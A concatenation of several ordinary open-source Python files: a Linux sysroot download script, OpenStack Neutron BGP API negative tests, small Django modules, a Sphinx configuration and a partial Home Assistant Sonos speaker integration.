VALID_ARCHS = ('arm', 'arm64', 'i386', 'amd64', 'mips')
class Error(Exception):
pass
def GetSha1(filename):
sha1 = hashlib.sha1()
with open(filename, 'rb') as f:
while True:
# Read in 1mb chunks, so it doesn't all have to be loaded into memory.
chunk = f.read(1024 * 1024)
if not chunk:
break
sha1.update(chunk)
return sha1.hexdigest()
def DetectHostArch():
# Figure out host arch using build/detect_host_arch.py and
# set target_arch to host arch
detected_host_arch = detect_host_arch.HostArch()
if detected_host_arch == 'x64':
return 'amd64'
elif detected_host_arch == 'ia32':
return 'i386'
elif detected_host_arch == 'arm':
return 'arm'
elif detected_host_arch == 'arm64':
return 'arm64'
elif detected_host_arch == 'mips':
return 'mips'
elif detected_host_arch == 'ppc':
return 'ppc'
elif detected_host_arch == 's390':
return 's390'
raise Error('Unrecognized host arch: %s' % detected_host_arch)
def main(args):
parser = optparse.OptionParser(
'usage: %prog [OPTIONS]', description=__doc__)
parser.add_option(
'--arch',
type='choice',
choices=VALID_ARCHS,
help='Sysroot architecture: %s' % ', '.join(VALID_ARCHS))
options, _ = parser.parse_args(args)
if not sys.platform.startswith('linux'):
return 0
if not options.arch:
print 'You much specify either --arch or --running-as-hook'
return 1
InstallDefaultSysrootForArch(options.arch)
return 0
def InstallDefaultSysrootForArch(target_arch):
if target_arch == 'amd64':
InstallSysroot('Jessie', 'amd64')
elif target_arch == 'arm':
InstallSysroot('Jessie', 'arm')
elif target_arch == 'arm64':
InstallSysroot('Jessie', 'arm64')
elif target_arch == 'i386':
InstallSysroot('Jessie', 'i386')
elif target_arch == 'mips':
InstallSysroot('Jessie', 'mips')
else:
raise Error('Unknown architecture: %s' % target_arch)
def InstallSysroot(target_platform, target_arch):
# The sysroot directory should match the one specified in build/common.gypi.
# TODO(thestig) Consider putting this elsewhere to avoid having to recreate
# it on every build.
linux_dir = os.path.dirname(SCRIPT_DIR)
sysroots_file = os.path.join(SCRIPT_DIR, 'sysroots.json')
sysroots = json.load(open(sysroots_file))
sysroot_key = '%s_%s' % (target_platform.lower(), target_arch)
if sysroot_key not in sysroots:
raise Error('No sysroot for: %s %s' % (target_platform, target_arch))
sysroot_dict = sysroots[sysroot_key]
revision = sysroot_dict['Revision']
tarball_filename = sysroot_dict['Tarball']
tarball_sha1sum = sysroot_dict['Sha1Sum']
sysroot = os.path.join(linux_dir, sysroot_dict['SysrootDir'])
url = '%s/%s/%s/%s' % (URL_PREFIX, URL_PATH, revision, tarball_filename)
stamp = os.path.join(sysroot, '.stamp')
if os.path.exists(stamp):
with open(stamp) as s:
if s.read() == url:
return
print 'Installing Debian %s %s root image: %s' % \
(target_platform, target_arch, sysroot)
if os.path.isdir(sysroot):
shutil.rmtree(sysroot)
os.mkdir(sysroot)
tarball = os.path.join(sysroot, tarball_filename)
print 'Downloading %s' % url
sys.stdout.flush()
sys.stderr.flush()
for _ in range(3):
try:
response = urllib2.urlopen(url)
with open(tarball, "wb") as f:
f.write(response.read())
break
except:
pass
else:
raise Error('Failed to download %s' % url)
sha1sum = GetSha1(tarball)
if sha1sum != tarball_sha1sum:
raise Error('Tarball sha1sum is wrong.'
'Expected %s, actual: %s' % (tarball_sha1sum, sha1sum))
subprocess.check_call(['tar', 'xf', tarball, '-C', sysroot])
os.remove(tarball)
with open(stamp, 'w') as s:
s.write(url)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except Error as e:
sys.stderr.write(str(e) + '\n')
sys.exit(1)
| dartino/dart-sdk | build/linux/sysroot_scripts/install-sysroot.py | Python | bsd-3-clause | 5,524 |
# Copyright 2016 Hewlett Packard Enterprise Development Company LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from tempest.lib import exceptions as lib_exc
from neutron.tests.api import test_bgp_speaker_extensions as test_base
from tempest import test
class BgpSpeakerTestJSONNegative(test_base.BgpSpeakerTestJSONBase):
"""Negative test cases asserting proper behavior of BGP API extension"""
@test.attr(type=['negative', 'smoke'])
@test.idempotent_id('75e9ee2f-6efd-4320-bff7-ae24741c8b06')
def test_create_bgp_speaker_illegal_local_asn(self):
self.assertRaises(lib_exc.BadRequest,
self.create_bgp_speaker,
local_as='65537')
@test.attr(type=['negative', 'smoke'])
@test.idempotent_id('6742ec2e-382a-4453-8791-13a19b47cd13')
def test_create_bgp_speaker_non_admin(self):
self.assertRaises(lib_exc.Forbidden,
self.client.create_bgp_speaker,
{'bgp_speaker': self.default_bgp_speaker_args})
@test.attr(type=['negative', 'smoke'])
@test.idempotent_id('33f7aaf0-9786-478b-b2d1-a51086a50eb4')
def test_create_bgp_peer_non_admin(self):
self.assertRaises(lib_exc.Forbidden,
self.client.create_bgp_peer,
{'bgp_peer': self.default_bgp_peer_args})
@test.attr(type=['negative', 'smoke'])
@test.idempotent_id('39435932-0266-4358-899b-0e9b1e53c3e9')
def test_update_bgp_speaker_local_asn(self):
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.assertRaises(lib_exc.BadRequest, self.update_bgp_speaker,
bgp_speaker_id, local_as='4321')
@test.idempotent_id('9cc33701-51e5-421f-a5d5-fd7b330e550f')
def test_get_advertised_routes_tenant_networks(self):
addr_scope1 = self.create_address_scope('my-scope1', ip_version=4)
addr_scope2 = self.create_address_scope('my-scope2', ip_version=4)
ext_net = self.create_shared_network(**{'router:external': True})
tenant_net1 = self.create_network()
tenant_net2 = self.create_network()
ext_subnetpool = self.create_subnetpool(
'test-pool-ext',
is_admin=True,
default_prefixlen=24,
address_scope_id=addr_scope1['id'],
prefixes=['8.0.0.0/8'])
tenant_subnetpool1 = self.create_subnetpool(
'tenant-test-pool',
default_prefixlen=25,
address_scope_id=addr_scope1['id'],
prefixes=['10.10.0.0/16'])
tenant_subnetpool2 = self.create_subnetpool(
'tenant-test-pool',
default_prefixlen=25,
address_scope_id=addr_scope2['id'],
prefixes=['11.10.0.0/16'])
self.create_subnet({'id': ext_net['id']},
cidr=netaddr.IPNetwork('8.0.0.0/24'),
ip_version=4,
client=self.admin_client,
subnetpool_id=ext_subnetpool['id'])
tenant_subnet1 = self.create_subnet(
{'id': tenant_net1['id']},
cidr=netaddr.IPNetwork('10.10.0.0/24'),
ip_version=4,
subnetpool_id=tenant_subnetpool1['id'])
tenant_subnet2 = self.create_subnet(
{'id': tenant_net2['id']},
cidr=netaddr.IPNetwork('11.10.0.0/24'),
ip_version=4,
subnetpool_id=tenant_subnetpool2['id'])
ext_gw_info = {'network_id': ext_net['id']}
router = self.admin_client.create_router(
'my-router',
distributed=False,
external_gateway_info=ext_gw_info)['router']
self.admin_routers.append(router)
self.admin_client.add_router_interface_with_subnet_id(
router['id'],
tenant_subnet1['id'])
self.admin_routerports.append({'router_id': router['id'],
'subnet_id': tenant_subnet1['id']})
self.admin_client.add_router_interface_with_subnet_id(
router['id'],
tenant_subnet2['id'])
self.admin_routerports.append({'router_id': router['id'],
'subnet_id': tenant_subnet2['id']})
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.admin_client.add_bgp_gateway_network(bgp_speaker_id,
ext_net['id'])
routes = self.admin_client.get_bgp_advertised_routes(bgp_speaker_id)
self.assertEqual(1, len(routes['advertised_routes']))
self.assertEqual(tenant_subnet1['cidr'],
routes['advertised_routes'][0]['destination'])
fixed_ip = router['external_gateway_info']['external_fixed_ips'][0]
self.assertEqual(fixed_ip['ip_address'],
routes['advertised_routes'][0]['next_hop'])
| wolverineav/neutron | neutron/tests/api/test_bgp_speaker_extensions_negative.py | Python | apache-2.0 | 6,469 |
from supertagging.modules import handlers
handlers.setup() | uclastudentmedia/django-supertagging | supertagging/__init__.py | Python | apache-2.0 | 59 |
from django import template
register = template.Library()
def submit_row(context):
"""
Displays the row of buttons for delete and save.
"""
opts = context['opts']
change = context['change']
is_popup = context['is_popup']
save_as = context['save_as']
return {
'onclick_attrib': (opts.get_ordered_objects() and change
and 'onclick="submitOrderForm();"' or ''),
'show_delete_link': (not is_popup and context['has_delete_permission']
and (change or context['show_delete'])),
'show_save_as_new': not is_popup and change and save_as,
'show_save_and_add_another': context['has_add_permission'] and
not is_popup and (not save_as or context['add']),
'show_save_and_continue': not is_popup and context['has_change_permission'],
'is_popup': is_popup,
'show_save': True,
}
submit_row = register.inclusion_tag('nexus/admin/submit_line.html', takes_context=True)(submit_row)
| jwmayfield/nexus-admin | nexus_admin/templatetags/nexus_admin.py | Python | apache-2.0 | 1,043 |
#
# django-filer documentation build configuration file, created by
# sphinx-quickstart on Tue Nov 16 22:05:55 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import datetime
import os
import sys
sys.path.append(os.path.abspath('../'))
from filer import __version__
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'django-filer'
copyright = '%s, Stefan Foulis' % (datetime.date.today().year,)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '.'.join(__version__.split('.')[0:2])
# The full version, including alpha/beta/rc tags.
release = __version__
for c in ('a', 'b', 'dev', 'r'):
if c in release:
tags.add('develop')
break
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-filerdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-filer.tex', 'django-filer Documentation',
'Stefan Foulis', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-filer', u'django-filer Documentation',
[u'Stefan Foulis'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| webu/django-filer | docs/conf.py | Python | bsd-3-clause | 7,456 |
"""Base class for common speaker tasks."""
from __future__ import annotations
import asyncio
from collections.abc import Callable, Coroutine
import contextlib
import datetime
from functools import partial
import logging
from typing import Any
import urllib.parse
import async_timeout
from soco.core import MUSIC_SRC_LINE_IN, MUSIC_SRC_RADIO, MUSIC_SRC_TV, SoCo
from soco.data_structures import DidlAudioBroadcast, DidlPlaylistContainer
from soco.events_base import Event as SonosEvent, SubscriptionBase
from soco.exceptions import SoCoException, SoCoSlaveException, SoCoUPnPException
from soco.music_library import MusicLibrary
from soco.plugins.sharelink import ShareLinkPlugin
from soco.snapshot import Snapshot
from homeassistant.components import zeroconf
from homeassistant.components.binary_sensor import DOMAIN as BINARY_SENSOR_DOMAIN
from homeassistant.components.media_player import DOMAIN as MP_DOMAIN
from homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN
from homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import entity_registry as ent_reg
from homeassistant.helpers.dispatcher import (
async_dispatcher_send,
dispatcher_connect,
dispatcher_send,
)
from homeassistant.util import dt as dt_util
from .alarms import SonosAlarms
from .const import (
BATTERY_SCAN_INTERVAL,
DATA_SONOS,
DOMAIN,
MDNS_SERVICE,
PLATFORMS,
SCAN_INTERVAL,
SEEN_EXPIRE_TIME,
SONOS_CREATE_ALARM,
SONOS_CREATE_BATTERY,
SONOS_CREATE_MEDIA_PLAYER,
SONOS_CREATE_SWITCHES,
SONOS_ENTITY_CREATED,
SONOS_POLL_UPDATE,
SONOS_REBOOTED,
SONOS_SEEN,
SONOS_SPEAKER_ADDED,
SONOS_STATE_PLAYING,
SONOS_STATE_TRANSITIONING,
SONOS_STATE_UPDATED,
SOURCE_LINEIN,
SOURCE_TV,
SUBSCRIPTION_TIMEOUT,
)
from .favorites import SonosFavorites
from .helpers import soco_error
EVENT_CHARGING = {
"CHARGING": True,
"NOT_CHARGING": False,
}
SUBSCRIPTION_SERVICES = [
"alarmClock",
"avTransport",
"contentDirectory",
"deviceProperties",
"renderingControl",
"zoneGroupTopology",
]
UNAVAILABLE_VALUES = {"", "NOT_IMPLEMENTED", None}
UNUSED_DEVICE_KEYS = ["SPID", "TargetRoomName"]
_LOGGER = logging.getLogger(__name__)
def fetch_battery_info_or_none(soco: SoCo) -> dict[str, Any] | None:
"""Fetch battery_info from the given SoCo object.
Returns None if the device doesn't support battery info
or if the device is offline.
"""
with contextlib.suppress(ConnectionError, TimeoutError, SoCoException):
return soco.get_battery_info()
def _timespan_secs(timespan: str | None) -> None | float:
"""Parse a time-span into number of seconds."""
if timespan in UNAVAILABLE_VALUES:
return None
assert timespan is not None
return sum(60 ** x[0] * int(x[1]) for x in enumerate(reversed(timespan.split(":"))))
class SonosMedia:
"""Representation of the current Sonos media."""
def __init__(self, soco: SoCo) -> None:
"""Initialize a SonosMedia."""
self.library = MusicLibrary(soco)
self.play_mode: str | None = None
self.playback_status: str | None = None
self.album_name: str | None = None
self.artist: str | None = None
self.channel: str | None = None
self.duration: float | None = None
self.image_url: str | None = None
self.queue_position: int | None = None
self.playlist_name: str | None = None
self.source_name: str | None = None
self.title: str | None = None
self.uri: str | None = None
self.position: float | None = None
self.position_updated_at: datetime.datetime | None = None
def clear(self) -> None:
"""Clear basic media info."""
self.album_name = None
self.artist = None
self.channel = None
self.duration = None
self.image_url = None
self.playlist_name = None
self.queue_position = None
self.source_name = None
self.title = None
self.uri = None
def clear_position(self) -> None:
"""Clear the position attributes."""
self.position = None
self.position_updated_at = None
class SonosSpeaker:
"""Representation of a Sonos speaker."""
def __init__(
self, hass: HomeAssistant, soco: SoCo, speaker_info: dict[str, Any]
) -> None:
"""Initialize a SonosSpeaker."""
self.hass = hass
self.soco = soco
self.household_id: str = soco.household_id
self.media = SonosMedia(soco)
self._share_link_plugin: ShareLinkPlugin | None = None
# Synchronization helpers
self._is_ready: bool = False
self._platforms_ready: set[str] = set()
# Subscriptions and events
self.subscriptions_failed: bool = False
self._subscriptions: list[SubscriptionBase] = []
self._resubscription_lock: asyncio.Lock | None = None
self._event_dispatchers: dict[str, Callable] = {}
# Scheduled callback handles
self._poll_timer: Callable | None = None
self._seen_timer: Callable | None = None
# Dispatcher handles
self._entity_creation_dispatcher: Callable | None = None
self._group_dispatcher: Callable | None = None
self._reboot_dispatcher: Callable | None = None
self._seen_dispatcher: Callable | None = None
# Device information
self.mac_address = speaker_info["mac_address"]
self.model_name = speaker_info["model_name"]
self.uid = speaker_info["uid"]
self.version = speaker_info["display_version"]
self.zone_name = speaker_info["zone_name"]
# Battery
self.battery_info: dict[str, Any] = {}
self._last_battery_event: datetime.datetime | None = None
self._battery_poll_timer: Callable | None = None
# Volume / Sound
self.volume: int | None = None
self.muted: bool | None = None
self.night_mode: bool | None = None
self.dialog_mode: bool | None = None
self.cross_fade: bool | None = None
self.bass_level: int | None = None
self.treble_level: int | None = None
# Misc features
self.buttons_enabled: bool | None = None
self.status_light: bool | None = None
# Grouping
self.coordinator: SonosSpeaker | None = None
self.sonos_group: list[SonosSpeaker] = [self]
self.sonos_group_entities: list[str] = []
self.soco_snapshot: Snapshot | None = None
self.snapshot_group: list[SonosSpeaker] | None = None
self._group_members_missing: set[str] = set()
def setup(self) -> None:
"""Run initial setup of the speaker."""
self.set_basic_info()
self._entity_creation_dispatcher = dispatcher_connect(
self.hass,
f"{SONOS_ENTITY_CREATED}-{self.soco.uid}",
self.async_handle_new_entity,
)
self._seen_dispatcher = dispatcher_connect(
self.hass, f"{SONOS_SEEN}-{self.soco.uid}", self.async_seen
)
self._reboot_dispatcher = dispatcher_connect(
self.hass, f"{SONOS_REBOOTED}-{self.soco.uid}", self.async_rebooted
)
self._group_dispatcher = dispatcher_connect(
self.hass,
SONOS_SPEAKER_ADDED,
self.update_group_for_uid,
)
if battery_info := fetch_battery_info_or_none(self.soco):
self.battery_info = battery_info
# Battery events can be infrequent, polling is still necessary
self._battery_poll_timer = self.hass.helpers.event.track_time_interval(
self.async_poll_battery, BATTERY_SCAN_INTERVAL
)
dispatcher_send(self.hass, SONOS_CREATE_BATTERY, self)
else:
self._platforms_ready.update({BINARY_SENSOR_DOMAIN, SENSOR_DOMAIN})
if new_alarms := [
alarm.alarm_id for alarm in self.alarms if alarm.zone.uid == self.soco.uid
]:
dispatcher_send(self.hass, SONOS_CREATE_ALARM, self, new_alarms)
else:
self._platforms_ready.add(SWITCH_DOMAIN)
dispatcher_send(self.hass, SONOS_CREATE_SWITCHES, self)
self._event_dispatchers = {
"AlarmClock": self.async_dispatch_alarms,
"AVTransport": self.async_dispatch_media_update,
"ContentDirectory": self.async_dispatch_favorites,
"DeviceProperties": self.async_dispatch_device_properties,
"RenderingControl": self.async_update_volume,
"ZoneGroupTopology": self.async_update_groups,
}
dispatcher_send(self.hass, SONOS_CREATE_MEDIA_PLAYER, self)
dispatcher_send(self.hass, SONOS_SPEAKER_ADDED, self.soco.uid)
#
# Entity management
#
async def async_handle_new_entity(self, entity_type: str) -> None:
"""Listen to new entities to trigger first subscription."""
if self._platforms_ready == PLATFORMS:
return
self._platforms_ready.add(entity_type)
if self._platforms_ready == PLATFORMS:
self._resubscription_lock = asyncio.Lock()
await self.async_subscribe()
self._is_ready = True
def write_entity_states(self) -> None:
"""Write states for associated SonosEntity instances."""
dispatcher_send(self.hass, f"{SONOS_STATE_UPDATED}-{self.soco.uid}")
@callback
def async_write_entity_states(self) -> None:
"""Write states for associated SonosEntity instances."""
async_dispatcher_send(self.hass, f"{SONOS_STATE_UPDATED}-{self.soco.uid}")
def set_basic_info(self) -> None:
"""Set basic information when speaker is reconnected."""
self.media.play_mode = self.soco.play_mode
self.update_volume()
#
# Properties
#
@property
def available(self) -> bool:
"""Return whether this speaker is available."""
return self._seen_timer is not None
@property
def alarms(self) -> SonosAlarms:
"""Return the SonosAlarms instance for this household."""
return self.hass.data[DATA_SONOS].alarms[self.household_id]
@property
def favorites(self) -> SonosFavorites:
"""Return the SonosFavorites instance for this household."""
return self.hass.data[DATA_SONOS].favorites[self.household_id]
@property
def is_coordinator(self) -> bool:
"""Return true if player is a coordinator."""
return self.coordinator is None
@property
def share_link(self) -> ShareLinkPlugin:
"""Cache the ShareLinkPlugin instance for this speaker."""
if not self._share_link_plugin:
self._share_link_plugin = ShareLinkPlugin(self.soco)
return self._share_link_plugin
@property
def subscription_address(self) -> str | None:
"""Return the current subscription callback address if any."""
if self._subscriptions:
addr, port = self._subscriptions[0].event_listener.address
return ":".join([addr, str(port)])
return None
#
# Subscription handling and event dispatchers
#
async def async_subscribe(self) -> bool:
"""Initiate event subscriptions."""
_LOGGER.debug("Creating subscriptions for %s", self.zone_name)
# Create a polling task in case subscriptions fail or callback events do not arrive
if not self._poll_timer:
self._poll_timer = self.hass.helpers.event.async_track_time_interval(
partial(
async_dispatcher_send,
self.hass,
f"{SONOS_POLL_UPDATE}-{self.soco.uid}",
),
SCAN_INTERVAL,
)
try:
await self.hass.async_add_executor_job(self.set_basic_info)
if self._subscriptions:
raise RuntimeError(
f"Attempted to attach subscriptions to player: {self.soco} "
f"when existing subscriptions exist: {self._subscriptions}"
)
subscriptions = [
self._subscribe(getattr(self.soco, service), self.async_dispatch_event)
for service in SUBSCRIPTION_SERVICES
]
await asyncio.gather(*subscriptions)
except SoCoException as ex:
_LOGGER.warning("Could not connect %s: %s", self.zone_name, ex)
return False
return True
async def _subscribe(
self, target: SubscriptionBase, sub_callback: Callable
) -> None:
"""Create a Sonos subscription."""
subscription = await target.subscribe(
auto_renew=True, requested_timeout=SUBSCRIPTION_TIMEOUT
)
subscription.callback = sub_callback
subscription.auto_renew_fail = self.async_renew_failed
self._subscriptions.append(subscription)
async def async_unsubscribe(self) -> None:
"""Cancel all subscriptions."""
_LOGGER.debug("Unsubscribing from events for %s", self.zone_name)
results = await asyncio.gather(
*(subscription.unsubscribe() for subscription in self._subscriptions),
return_exceptions=True,
)
for result in results:
if isinstance(result, Exception):
_LOGGER.debug("Unsubscribe failed for %s: %s", self.zone_name, result)
self._subscriptions = []
@callback
def async_renew_failed(self, exception: Exception) -> None:
"""Handle a failed subscription renewal."""
self.hass.async_create_task(self.async_resubscribe(exception))
async def async_resubscribe(self, exception: Exception) -> None:
"""Attempt to resubscribe when a renewal failure is detected."""
async with self._resubscription_lock:
if not self.available:
return
if getattr(exception, "status", None) == 412:
_LOGGER.warning(
"Subscriptions for %s failed, speaker may have lost power",
self.zone_name,
)
else:
_LOGGER.error(
"Subscription renewals for %s failed",
self.zone_name,
exc_info=exception,
)
await self.async_unseen()
@callback
def async_dispatch_event(self, event: SonosEvent) -> None:
"""Handle callback event and route as needed."""
if self._poll_timer:
_LOGGER.debug(
"Received event, cancelling poll timer for %s", self.zone_name
)
self._poll_timer()
self._poll_timer = None
dispatcher = self._event_dispatchers[event.service.service_type]
dispatcher(event)
@callback
def async_dispatch_alarms(self, event: SonosEvent) -> None:
"""Add the soco instance associated with the event to the callback."""
if not (event_id := event.variables.get("alarm_list_version")):
return
self.alarms.async_handle_event(event_id, self.soco)
@callback
def async_dispatch_device_properties(self, event: SonosEvent) -> None:
"""Update device properties from an event."""
self.hass.async_create_task(self.async_update_device_properties(event))
async def async_update_device_properties(self, event: SonosEvent) -> None:
"""Update device properties from an event."""
if more_info := event.variables.get("more_info"):
battery_dict = dict(x.split(":") for x in more_info.split(","))
for unused in UNUSED_DEVICE_KEYS:
battery_dict.pop(unused, None)
if not battery_dict:
return
if "BattChg" not in battery_dict:
_LOGGER.debug(
"Unknown device properties update for %s (%s), please report an issue: '%s'",
self.zone_name,
self.model_name,
more_info,
)
return
await self.async_update_battery_info(battery_dict)
self.async_write_entity_states()
@callback
def async_dispatch_favorites(self, event: SonosEvent) -> None:
"""Add the soco instance associated with the event to the callback."""
if not (event_id := event.variables.get("favorites_update_id")):
return
if not (container_ids := event.variables.get("container_update_i_ds")):
return
self.favorites.async_handle_event(event_id, container_ids, self.soco)
@callback
def async_dispatch_media_update(self, event: SonosEvent) -> None:
"""Update information about currently playing media from an event."""
if crossfade := event.variables.get("current_crossfade_mode"):
self.cross_fade = bool(int(crossfade))
self.hass.async_add_executor_job(self.update_media, event)
@callback
def async_update_volume(self, event: SonosEvent) -> None:
"""Update information about currently volume settings."""
variables = event.variables
if "volume" in variables:
self.volume = int(variables["volume"]["Master"])
if "mute" in variables:
self.muted = variables["mute"]["Master"] == "1"
if "night_mode" in variables:
self.night_mode = variables["night_mode"] == "1"
if "dialog_level" in variables:
self.dialog_mode = variables["dialog_level"] == "1"
if "bass_level" in variables:
self.bass_level = variables["bass_level"]
if "treble_level" in variables:
self.treble_level = variables["treble_level"]
self.async_write_entity_states()
#
# Speaker availability methods
#
@callback
def _async_reset_seen_timer(self):
"""Reset the _seen_timer scheduler."""
if self._seen_timer:
self._seen_timer()
self._seen_timer = self.hass.helpers.event.async_call_later(
SEEN_EXPIRE_TIME.total_seconds(), self.async_unseen
)
async def async_seen(self, soco: SoCo | None = None) -> None:
"""Record that this speaker was seen right now."""
if soco is not None:
self.soco = soco
was_available = self.available
self._async_reset_seen_timer()
if was_available:
self.async_write_entity_states()
return
_LOGGER.debug(
"%s [%s] was not available, setting up",
self.zone_name,
self.soco.ip_address,
)
if self._is_ready and not self.subscriptions_failed:
done = await self.async_subscribe()
if not done:
await self.async_unseen()
self.async_write_entity_states()
async def async_unseen(
self, callback_timestamp: datetime.datetime | None = None
) -> None:
"""Make this player unavailable when it was not seen recently."""
data = self.hass.data[DATA_SONOS]
if (zcname := data.mdns_names.get(self.soco.uid)) and callback_timestamp:
# Called by a _seen_timer timeout, check mDNS one more time
# This should not be checked in an "active" unseen scenario
aiozeroconf = await zeroconf.async_get_async_instance(self.hass)
if await aiozeroconf.async_get_service_info(MDNS_SERVICE, zcname):
# We can still see the speaker via zeroconf check again later.
self._async_reset_seen_timer()
return
_LOGGER.debug(
"No activity and could not locate %s on the network. Marking unavailable",
zcname,
)
self._share_link_plugin = None
if self._seen_timer:
self._seen_timer()
self._seen_timer = None
if self._poll_timer:
self._poll_timer()
self._poll_timer = None
await self.async_unsubscribe()
self.hass.data[DATA_SONOS].discovery_known.discard(self.soco.uid)
self.async_write_entity_states()
async def async_rebooted(self, soco: SoCo) -> None:
"""Handle a detected speaker reboot."""
_LOGGER.warning(
"%s rebooted or lost network connectivity, reconnecting with %s",
self.zone_name,
soco,
)
await self.async_unsubscribe()
self.soco = soco
await self.async_subscribe()
self._async_reset_seen_timer()
self.async_write_entity_states()
#
# Battery management
#
async def async_update_battery_info(self, battery_dict: dict[str, Any]) -> None:
"""Update battery info using the decoded SonosEvent."""
self._last_battery_event = dt_util.utcnow()
is_charging = EVENT_CHARGING[battery_dict["BattChg"]]
if not self._battery_poll_timer:
# Battery info received for an S1 speaker
new_battery = not self.battery_info
self.battery_info.update(
{
"Level": int(battery_dict["BattPct"]),
"PowerSource": "EXTERNAL" if is_charging else "BATTERY",
}
)
if new_battery:
_LOGGER.warning(
"S1 firmware detected on %s, battery info may update infrequently",
self.zone_name,
)
async_dispatcher_send(self.hass, SONOS_CREATE_BATTERY, self)
return
if is_charging == self.charging:
self.battery_info.update({"Level": int(battery_dict["BattPct"])})
else:
if battery_info := await self.hass.async_add_executor_job(
fetch_battery_info_or_none, self.soco
):
self.battery_info = battery_info
@property
def power_source(self) -> str | None:
"""Return the name of the current power source.
Observed to be either BATTERY or SONOS_CHARGING_RING or USB_POWER.
May be an empty dict if used with an S1 Move.
"""
return self.battery_info.get("PowerSource")
@property
def charging(self) -> bool | None:
